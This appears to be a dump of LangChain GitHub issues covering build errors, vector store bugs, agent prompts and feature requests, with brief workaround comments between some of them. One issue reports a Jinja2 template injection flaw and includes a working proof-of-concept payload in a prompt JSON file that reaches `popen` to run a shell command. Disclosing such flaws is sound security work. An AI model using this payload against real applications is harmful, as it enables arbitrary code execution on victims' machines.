### System Info Hi, can't update langchain. any insight ? ``` Building wheels for collected packages: jq Building wheel for jq (pyproject.toml) ... error error: subprocess-exited-with-error × Building wheel for jq (pyproject.toml) did not run successfully. │ exit code: 1 ╰─> [5 lines of output] running bdist_wheel running build running build_ext Executing: ./configure CFLAGS=-fPIC --prefix=C:\Users\mysuser\AppData\Local\Temp\pip-install-7643mu3e\jq_64b3898552df463e990cf884cae8a414\_deps\build\onig-install-6.9.4 error: [WinError 2] The system cannot find the file specified [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. ERROR: Failed building wheel for jq Failed to build jq ERROR: Could not build wheels for jq, which is required to install pyproject.toml-based projects ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction pip install langchain[all] --upgrade ### Expected behavior no issue during installtion
Building wheels for collected package: jq failed in Windows
https://api.github.com/repos/langchain-ai/langchain/issues/4396/comments
27
2023-05-09T12:58:59Z
2024-06-12T05:00:12Z
https://github.com/langchain-ai/langchain/issues/4396
1,701,984,751
4,396
[ "langchain-ai", "langchain" ]
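The failure happens because the `jq` source build invokes `./configure`, which needs a POSIX toolchain that plain Windows lacks. If the JSON loader is not needed, the build can be sidestepped by skipping the `all` extra; otherwise forcing a prebuilt wheel may help. A workaround, not a fix:

```shell
pip install --upgrade langchain
# If jq itself is required, refuse source builds and use a wheel:
pip install --only-binary :all: jq
```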
### System Info Weaviate vectorstore not getting initialized with Azure OpenAI embeddings. Code: ``` from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import Weaviate from langchain.embeddings.base import Embeddings auth_config = weaviate.auth.AuthApiKey(api_key=WEAVIATE_API) client = weaviate.Client(url=WEAVIATE_HOST, auth_client_secret=auth_config) embeddings_model: Embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1) vectorstore = Weaviate(client=client, index_name="chatbot_dev", text_key="content", embedding=embeddings_model) ``` Error: ``` TypeError: Weaviate.__init__() got an unexpected keyword argument 'embedding' ``` Also, tried to initialize with Weaviate.from_texts() ``` from langchain.vectorstores import Weaviate qa = Weaviate.from_texts(texts=['here is a sample'], embedding=embeddings_model, index_name="content", weaviate_url="your Weaviate URL") ``` Error: ``` NotImplementedError: weaviate does not currently support `from_texts` ``` ### Who can help? 
@ruanwz @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import Weaviate from langchain.embeddings.base import Embeddings auth_config = weaviate.auth.AuthApiKey(api_key=WEAVIATE_API) client = weaviate.Client(url=WEAVIATE_HOST, auth_client_secret=auth_config) embeddings_model: Embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1) vectorstore = Weaviate(client=client, index_name="chatbot_dev", text_key="content", embedding=embeddings_model) ``` ### Expected behavior Weaviate vector store library should be generic to support multiple use cases.
Weaviate Vectorstore not initialized with Azure OpenAI embeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4395/comments
5
2023-05-09T12:57:24Z
2023-12-28T12:21:38Z
https://github.com/langchain-ai/langchain/issues/4395
1,701,981,229
4,395
[ "langchain-ai", "langchain" ]
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
Template injection to arbitrary code execution
https://api.github.com/repos/langchain-ai/langchain/issues/4394/comments
4
2023-05-09T12:28:24Z
2023-10-10T15:15:44Z
https://github.com/langchain-ai/langchain/issues/4394
1,701,910,416
4,394
[ "langchain-ai", "langchain" ]
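The payload works because Jinja2 evaluates arbitrary expressions while rendering. When template files come from untrusted sources, a substitution-only engine removes the code-execution surface entirely; Python's `string.Template`, for example, only replaces named placeholders and never evaluates anything:

```python
from string import Template

# A hostile template: under Jinja2 the second placeholder could walk
# __subclasses__ and spawn a process; string.Template cannot.
malicious = "Tell me a $prompt ${__import__}"

result = Template(malicious).safe_substitute(prompt="joke")
print(result)  # unknown placeholders are left as literal text
```

When Jinja2 features are still needed, `jinja2.sandbox.SandboxedEnvironment` is a middle ground, though it restricts rather than eliminates attribute access.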
### System Info **Version Information** **Platform** : Windows 10 **LangChain** - 0.0.149 **Python** - 3.8.9 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The step-by-step process from given [link](https://python.langchain.com/en/latest/modules/models/llms/integrations/writer.html) ![image](https://user-images.githubusercontent.com/23481244/237052818-5f14f21a-727f-4e39-8b5b-845ec6f8e286.png) To reproduce the SSLError ![image](https://user-images.githubusercontent.com/23481244/237051889-0cf0d7c1-9e8c-43d0-8c68-f716c8b6281e.png) https://python.langchain.com/en/latest/modules/models/llms/integrations/writer.html ### Expected behavior Run the code with errors and warnings with Writer LLM
SSLError: HTTPSConnectionPool(host='api.llm.writer.com', port=443): Max retries exceeded
https://api.github.com/repos/langchain-ai/langchain/issues/4391/comments
1
2023-05-09T09:19:32Z
2023-09-10T16:19:57Z
https://github.com/langchain-ai/langchain/issues/4391
1,701,688,968
4,391
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. ConversationalChatAgent places `FORMAT_INSTRUCTIONS` as well as the tools section within the human message, not within the system message. This is fine as long as ChatGPT-3.5 is being used, where the LLM gives more weight to the human message than the system message. But that is not the case for ChatGPT-4, where the system message has higher weight than the human message. In fact, with ChatGPT-4, when `FORMAT_INSTRUCTIONS` is embedded within the human message, the output generated does not always follow the format. The reverse, however, is not true. <s>IMHO, the [JSONDecodeError](https://github.com/hwchase17/langchain/issues/3455) may vanish for ChatGPT-4 if we place the format instruction inside the system message.</s> ### Suggestion: I have been able to modify the implementation inside `langchain.agents.conversational_chat` (below), but I guess it would be better if we change the langchain API as well. On top of my change, I had to use the changes from this [PR](https://github.com/hwchase17/langchain/pull/3480) to handle the cases when GPT-4 does not respond with the JSON format.
``` from typing import Sequence, Optional, List, Any from pydantic import Field from langchain.tools.base import BaseTool from langchain.agents import ConversationalChatAgent from langchain.schema import ( BaseOutputParser, ) from langchain.prompts.base import BasePromptTemplate from langchain.prompts.chat import ( ChatPromptTemplate, HumanMessagePromptTemplate, MessagesPlaceholder, SystemMessagePromptTemplate, ) from langchain.agents.agent import Agent, AgentOutputParser class GPT4ConversationalChatAgent(ConversationalChatAgent): @classmethod def create_prompt( cls, tools: Sequence[BaseTool], system_message: str = PREFIX, human_message: str = SUFFIX, input_variables: Optional[List[str]] = None, output_parser: Optional[BaseOutputParser] = None, ) -> BasePromptTemplate: tool_strings = "\n".join( [f"> {tool.name}: {tool.description}" for tool in tools] ) tool_names = ", ".join([tool.name for tool in tools]) _output_parser = output_parser or cls._get_default_output_parser() format_instructions = system_message.format( format_instructions=_output_parser.get_format_instructions() ) final_system_prompt = format_instructions.format( tool_names=tool_names, tools=tool_strings ) if input_variables is None: input_variables = ["input", "chat_history", "agent_scratchpad"] messages = [ SystemMessagePromptTemplate.from_template(final_system_prompt), MessagesPlaceholder(variable_name="chat_history"), HumanMessagePromptTemplate.from_template(human_message), MessagesPlaceholder(variable_name="agent_scratchpad"), ] return ChatPromptTemplate(input_variables=input_variables, messages=messages) memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) agent = GPT4ConversationalChatAgent.from_llm_and_tools( llm=llm, tools=tools, system_message=PREFIX, human_message=SUFFIX, ) agent_chain = AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True, memory=memory) ```
Option for ConversationalChatAgent to place format instruction and tools within System Message for ChatGPT 4.0
https://api.github.com/repos/langchain-ai/langchain/issues/4385/comments
2
2023-05-09T07:32:07Z
2023-09-19T16:11:37Z
https://github.com/langchain-ai/langchain/issues/4385
1,701,519,474
4,385
[ "langchain-ai", "langchain" ]
### System Info chain = load_summarize_chain(llm, chain_type="refine", verbose=True) when llm uses AzureOpenAI, it fails to send the request and gives this error File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 230, in request resp, got_stream = self._interpret_response(result, stream) File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 624, in _interpret_response self._interpret_response_line( File "C:\Users\\.conda\envs\captionSummary\lib\site-packages\openai\api_requestor.py", line 687, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction chain = load_summarize_chain(llm, chain_type="refine", verbose=True) when llm uses AzureOpenAI, it fails to send the request and gives this error ### Expected behavior Works well with the Azure API call.
Could not use load_summarize_chain with Azure API.
https://api.github.com/repos/langchain-ai/langchain/issues/4384/comments
6
2023-05-09T05:54:19Z
2024-07-15T14:19:28Z
https://github.com/langchain-ai/langchain/issues/4384
1,701,388,720
4,384
[ "langchain-ai", "langchain" ]
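`Resource not found` from Azure OpenAI usually means the request went to an endpoint path the resource does not serve, which happens when the Azure-specific settings or the deployment name are missing. A configuration sketch, where all names are placeholders and the API version shown is an assumption that may need updating:

```shell
export OPENAI_API_TYPE="azure"
export OPENAI_API_BASE="https://<your-resource>.openai.azure.com/"
export OPENAI_API_VERSION="2023-03-15-preview"
export OPENAI_API_KEY="<your-key>"
# In code the deployment must be named explicitly, e.g.
#   llm = AzureOpenAI(deployment_name="<your-deployment>")
# before passing it to load_summarize_chain.
```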
### System Info langchain 0.0.162 python 3.8 HuggingFace free tier server ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [x] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings import HuggingFaceEmbeddings embeddings = HuggingFaceEmbeddings() ``` ``` /user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_errors.py", line 259, in hf_raise_for_status response.raise_for_status() File "/home/user/.local/lib/python3.8/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://huggingface.co/api/models/sentence-transformers/all-mpnet-base-v2 The above exception was the direct cause of the following exception: Traceback (most recent call last): File "app.py", line 2, in <module> embeddings = HuggingFaceEmbeddings() File "/home/user/.local/lib/python3.8/site-packages/langchain/embeddings/huggingface.py", line 54, in __init__ self.client = sentence_transformers.SentenceTransformer( File "/home/user/.local/lib/python3.8/site-packages/sentence_transformers/SentenceTransformer.py", line 87, in __init__ snapshot_download(model_name_or_path, File "/home/user/.local/lib/python3.8/site-packages/sentence_transformers/util.py", line 442, in snapshot_download model_info = _api.model_info(repo_id=repo_id, revision=revision, token=token) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_validators.py", line 120, in _inner_fn return fn(*args, **kwargs) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/hf_api.py", line 1604, in 
model_info hf_raise_for_status(r) File "/home/user/.local/lib/python3.8/site-packages/huggingface_hub/utils/_errors.py", line 291, in hf_raise_for_status raise RepositoryNotFoundError(message, response) from e huggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-6459cb14-023db7f06244e0660677dfb9) ``` ### Expected behavior Successfully creates an embeddings model.
https://huggingface.co/api/models/sentence-transformers/all-mpnet-base-v2 not found? HTTP 401
https://api.github.com/repos/langchain-ai/langchain/issues/4379/comments
9
2023-05-09T04:46:22Z
2023-05-09T18:47:14Z
https://github.com/langchain-ai/langchain/issues/4379
1,701,318,779
4,379
[ "langchain-ai", "langchain" ]
### Feature request I propose refactoring the TimeWeightedVectorStore to use epoch milliseconds as the time format instead of directly passing in a python `datetime` object as the `created_at` and `last_accessed_at` fields. The current implementation _does_ allow users to specify a current_time when adding documents, but on retrieval it always uses datetime.now() to rescore docs. Adding: ```py def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]: """Add documents to vectorstore.""" current_time = kwargs.get("current_time", datetime.now()) # Avoid mutating input documents dup_docs = [deepcopy(d) for d in documents] for i, doc in enumerate(dup_docs): if "last_accessed_at" not in doc.metadata: doc.metadata["last_accessed_at"] = current_time if "created_at" not in doc.metadata: doc.metadata["created_at"] = current_time doc.metadata["buffer_idx"] = len(self.memory_stream) + i self.memory_stream.extend(dup_docs) return self.vectorstore.add_documents(dup_docs, **kwargs) ``` Retrieval: ```py def get_relevant_documents(self, query: str) -> List[Document]: """Return documents that are relevant to the query.""" current_time = datetime.now() docs_and_scores = { doc.metadata["buffer_idx"]: (doc, self.default_salience) for doc in self.memory_stream[-self.k :] } # If a doc is considered salient, update the salience score docs_and_scores.update(self.get_salient_docs(query)) rescored_docs = [ (doc, self._get_combined_score(doc, relevance, current_time)) for doc, relevance in docs_and_scores.values() ] rescored_docs.sort(key=lambda x: x[1], reverse=True) result = [] # Ensure frequently accessed memories aren't forgotten current_time = datetime.now() for doc, _ in rescored_docs[: self.k]: # TODO: Update vector store doc once `update` method is exposed. buffered_doc = self.memory_stream[doc.metadata["buffer_idx"]] buffered_doc.metadata["last_accessed_at"] = current_time result.append(buffered_doc) return result ``` What's the problem with this? 
`datetime.now()` is not JSON (de-)serializable. ### Motivation While this class works fine in the example using a local FAISS vectorstore, it requires you to define custom JSONEncoder and Decoders if you want to persist to/instantiate from local. It also doesn't work with the Redis Vectorstore because that serializes to JSON before storing the docs. ### Your contribution There are a couple options to fix this, the least invasive of which is: - use epoch ms as the fixed format for storing time values b/c it's nice for serDe - convert the times into python datetime objects in the `_get_hours_passed` function This function is the only place where the timestamps _need_ to be python datetime objects. The alternative fixes involve expanding the API surface area of any vectorstore where JSON encoders and decoders are needed to solve this problem. No one likes prop drilling.
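A minimal sketch of the epoch-milliseconds convention proposed above; the helper names here are illustrative, not part of LangChain's API:

```python
from datetime import datetime, timezone

def to_epoch_ms(dt: datetime) -> int:
    """Serialize a datetime as integer epoch milliseconds (JSON-safe)."""
    return int(dt.timestamp() * 1000)

def from_epoch_ms(ms: int) -> datetime:
    """Deserialize epoch milliseconds back into an aware datetime."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)

def hours_passed(now_ms: int, ref_ms: int) -> float:
    """The only place the timestamps need arithmetic: elapsed hours."""
    return (now_ms - ref_ms) / (1000 * 3600)

created = to_epoch_ms(datetime(2023, 5, 9, tzinfo=timezone.utc))
later = to_epoch_ms(datetime(2023, 5, 9, 12, tzinfo=timezone.utc))
```

Since the values are plain integers, metadata containing them survives `json.dumps`/`json.loads` round trips without custom encoders, which is the point of the proposal.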
(De)Serializing memories in TimeWeightedVectorStore
https://api.github.com/repos/langchain-ai/langchain/issues/4377/comments
2
2023-05-09T02:40:31Z
2024-06-26T06:05:36Z
https://github.com/langchain-ai/langchain/issues/4377
1,701,213,657
4,377
[ "langchain-ai", "langchain" ]
### System Info LangChain version: 0.0.162 Python version: 3.8.10 ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [x] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ```python import os from langchain.chat_models import ChatOpenAI from langchain.agents import load_tools, initialize_agent, AgentType from langchain.memory import ConversationBufferMemory os.environ["OPENAI_API_KEY"] = "" llm = ChatOpenAI( temperature = 0.9, max_tokens = 1024, model_name = 'gpt-4' ) def create_memory(): memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) memory.clear() return memory tools = load_tools( ["human"], llm=llm ) agent = initialize_agent( tools, llm, agent=AgentType.CHAT_CONVERSATIONAL_REACT_DESCRIPTION, memory=create_memory(), verbose=True ) agent.run('Write a python program to run a simple HTTP server') ``` ### Expected behavior Agent is able to correctly parse the response from OpenAI.
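The failure mode can be sketched without LangChain: a parser that grabs the first fenced block will pick up the model's code snippet instead of the action JSON. A more tolerant approach (illustrative only, not the actual `ConvoOutputParser` implementation) is to scan all fenced blocks for one that decodes to the expected action object:

```python
import json
import re

def extract_action(text: str) -> dict:
    """Return the first fenced block that decodes to an action JSON object."""
    for block in re.findall(r"```(?:json)?\s*(.*?)```", text, re.DOTALL):
        try:
            obj = json.loads(block)
        except json.JSONDecodeError:
            continue  # e.g. the python code block inside the reply
        if isinstance(obj, dict) and "action" in obj:
            return obj
    raise ValueError(f"No action JSON found in: {text!r}")

reply = (
    "Here is the program:\n"
    "```python\nimport http.server\n```\n"
    '```json\n{"action": "Final Answer", "action_input": "done"}\n```'
)
parsed = extract_action(reply)
```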
ConvoOutputParser fails to parse a valid output which contains a code block
https://api.github.com/repos/langchain-ai/langchain/issues/4371/comments
3
2023-05-09T01:22:18Z
2023-11-14T16:08:54Z
https://github.com/langchain-ai/langchain/issues/4371
1,701,154,334
4,371
[ "langchain-ai", "langchain" ]
### Feature request Redis vectorstore allows for three different distance metrics: `L2` (flat L2), `COSINE`, and `IP` (inner product). Currently, the `Redis._create_index` method hard codes the distance metric to COSINE. ```py def _create_index(self, dim: int = 1536) -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Constants distance_metric = ( "COSINE" # distance metric for the vectors (ex. COSINE, IP, L2) ) schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) ``` This should be parameterized. ### Motivation I'd like to be able to use L2 distance metrics. ### Your contribution I've already forked and made a branch that parameterizes the distance metric in `langchain.vectorstores.redis`: ```py def _create_index(self, dim: int = 1536, distance_metric: REDIS_DISTANCE_METRICS = "COSINE") -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." 
) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Define schema schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) def _create_index(self, dim: int = 1536, distance_metric: REDIS_DISTANCE_METRICS = "COSINE") -> None: try: from redis.commands.search.field import TextField, VectorField from redis.commands.search.indexDefinition import IndexDefinition, IndexType except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) # Check if index exists if not _check_index_exists(self.client, self.index_name): # Define schema schema = ( TextField(name=self.content_key), TextField(name=self.metadata_key), VectorField( self.vector_key, "FLAT", { "TYPE": "FLOAT32", "DIM": dim, "DISTANCE_METRIC": distance_metric, }, ), ) prefix = _redis_prefix(self.index_name) # Create Redis Index self.client.ft(self.index_name).create_index( fields=schema, definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH), ) ... @classmethod def from_texts( cls: Type[Redis], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, content_key: str = "content", metadata_key: str = "metadata", vector_key: str = "content_vector", distance_metric: REDIS_DISTANCE_METRICS = "COSINE", **kwargs: Any, ) -> Redis: """Create a Redis vectorstore from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new index for the embeddings in Redis. 3. Adds the documents to the newly created Redis index. This is intended to be a quick way to get started. Example: .. 
code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = RediSearch.from_texts( texts, embeddings, redis_url="redis://username:password@localhost:6379" ) """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if "redis_url" in kwargs: kwargs.pop("redis_url") # Name of the search index if not given if not index_name: index_name = uuid.uuid4().hex # Create instance instance = cls( redis_url=redis_url, index_name=index_name, embedding_function=embedding.embed_query, content_key=content_key, metadata_key=metadata_key, vector_key=vector_key, **kwargs, ) # Create embeddings over documents embeddings = embedding.embed_documents(texts) # Create the search index instance._create_index(dim=len(embeddings[0]), distance_metric=distance_metric) # Add data to Redis instance.add_texts(texts, metadatas, embeddings) return instance ``` I'll make the PR and link this issue
Add distance metric param to Redis vectorstore index
https://api.github.com/repos/langchain-ai/langchain/issues/4368/comments
0
2023-05-09T00:40:32Z
2023-05-11T07:20:03Z
https://github.com/langchain-ai/langchain/issues/4368
1,701,125,645
4,368
[ "langchain-ai", "langchain" ]
### System Info Consider the following python code snippet below. In this example, the code produces an error. This is due to the fact that it is not correctly parsing the JSON strings. For some reason, the template will try to look for the variable "Person", when that is just a JSON output form. This means that the classes are confusing what are variables of the template and what are just text within a JSON string on what we are feeding as an example. What is curious is that this does not happen for the PromptTemplate class. So, it must be about the iteration between examples. ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ```python from langchain import PromptTemplate from langchain import FewShotPromptTemplate from langchain.prompts.example_selector import LengthBasedExampleSelector import json # create our examples examples = [ { "query": "my text number 1", "answer": """{"person": "Jack", "Location": "France"}""" }, { "query": "my text number 2", "answer": """{"person": "James", "Location": "Portugal"}""" } ] # create an example template example_template = """ User: {query} AI: {answer} """ # create a prompt example from above template example_prompt = PromptTemplate( input_variables=["query", "answer"], template=example_template ) # now break our previous prompt into a prefix and suffix # the prefix is our instructions task_description = f""" Context for the task """ # and the suffix our user input and output indicator instruction = """ User: {query} AI: """ # now create the few shot prompt template few_shot_prompt_template = FewShotPromptTemplate(
examples=examples, example_prompt=example_prompt, prefix=task_description, suffix=instruction, input_variables=["query"], example_separator="\n\n" ) print(few_shot_prompt_template.format(query="My awesome query")) ``` ### Expected behavior It would be expected to output a prompt with several examples in which the answer was a JSON string: """ User: My text number 1 AI: {"person": "Jack", "Location": "France"} User: My text number 2 AI: {"person": "James", "Location": "Portugal"} User: My new input text AI: """
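One workaround, given that these templates use Python `str.format` semantics: double the braces in the JSON answers so they are treated as literal characters rather than template variables (a sketch of the mechanism, not a fix to the library itself):

```python
# Literal JSON inside a format-style template: {{ and }} render as { and },
# so "person" is no longer mistaken for a template variable.
example_template = """
User: {query}
AI: {{"person": "Jack", "Location": "France"}}
"""

rendered = example_template.format(query="my text number 1")
```

If the examples are built programmatically, each `answer` string would need its braces doubled before being handed to the template.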
FewShotPromptTemplate bug on examples with JSON strings
https://api.github.com/repos/langchain-ai/langchain/issues/4367/comments
7
2023-05-08T23:29:13Z
2024-07-08T10:32:17Z
https://github.com/langchain-ai/langchain/issues/4367
1,701,078,306
4,367
[ "langchain-ai", "langchain" ]
### System Info langchain v0.0.162 python3.10 ### Who can help? @hwchase17 I believe issue was introduced here: https://github.com/hwchase17/langchain/pull/2963 This works when calling `__init__` directly, but the model_name is not passed to `__init__` when using `from_tiktoken_encoder()` ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` print(TokenTextSplitter()._tokenizer) # <Encoding 'gpt2'> print(TokenTextSplitter(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> print(TokenTextSplitter.from_tiktoken_encoder(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'gpt2'> ``` ### Expected behavior ``` print(TokenTextSplitter()._tokenizer) # <Encoding 'gpt2'> print(TokenTextSplitter(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> print(TokenTextSplitter.from_tiktoken_encoder(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> ```
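The shape of the bug can be reproduced without tiktoken at all: a classmethod that accepts `model_name` but never forwards it to the constructor (a stripped-down sketch, not LangChain's real code):

```python
class Splitter:
    def __init__(self, model_name: str = "gpt2"):
        self.model_name = model_name  # decides which encoding is used

    @classmethod
    def from_encoder(cls, model_name: str = "gpt2", **kwargs):
        # model_name is consumed here (e.g. to build a length function)
        # but never added to kwargs, so __init__ falls back to its default.
        return cls(**kwargs)

direct = Splitter(model_name="gpt-3.5-turbo")
via_classmethod = Splitter.from_encoder(model_name="gpt-3.5-turbo")
```

The fix is simply forwarding it, `return cls(model_name=model_name, **kwargs)`, in the classmethod.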
TokenTextSplitter ignores model_name when using from_tiktoken_encoder
https://api.github.com/repos/langchain-ai/langchain/issues/4357/comments
0
2023-05-08T19:47:49Z
2023-05-08T23:36:41Z
https://github.com/langchain-ai/langchain/issues/4357
1,700,828,804
4,357
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi, I'm creating a pdf chatbot with memory and the chain I use is ConversationalRetrievalChain + ConversationBufferMemory, but it seems that it can only remember some chat history. Does anyone have an idea of the reason? It works well on a question like `can you summarize the answer?`, but it cannot remember the first question I asked, ```python query = "Hi, what is my first question?" result = qa({"question": query}) print(result['answer']) ``` ``` I'm sorry, but I don't have access to that information as our conversation history is not stored. Is there anything else I can help you with? ``` Here is my code: ```python def get_chat_history(inputs) -> str: res = [] for human, ai in inputs: res.append(f"Human:{human}\nAI:{ai}") return "\n".join(res) memory = ConversationBufferMemory( memory_key='chat_history', return_messages=True, output_key='answer') # Create conversation chain that uses our vectordb as retriever; this also allows for chat history management qa = ConversationalRetrievalChain.from_llm(ChatOpenAI(temperature=0,model_name='gpt-3.5-turbo'), db.as_retriever(),memory=memory, get_chat_history=get_chat_history, return_source_documents=True) ``` ### Suggestion: _No response_
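The `get_chat_history` helper above can be exercised on its own to check what actually reaches the condense-question prompt (a standalone copy of the same function, with made-up history):

```python
def get_chat_history(inputs) -> str:
    res = []
    for human, ai in inputs:
        res.append(f"Human:{human}\nAI:{ai}")
    return "\n".join(res)

history = [
    ("What is attention?", "A weighting mechanism over tokens."),
    ("Can you summarize the answer?", "Attention weights tokens."),
]
formatted = get_chat_history(history)
```

Printing `formatted` during a run is a quick way to see whether the buffer really contains the first question when the follow-up is asked.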
ConversationalRetrievalChain + Memory: Can only remember partial memory
https://api.github.com/repos/langchain-ai/langchain/issues/4355/comments
3
2023-05-08T19:34:53Z
2023-11-26T16:09:44Z
https://github.com/langchain-ai/langchain/issues/4355
1,700,812,707
4,355
[ "langchain-ai", "langchain" ]
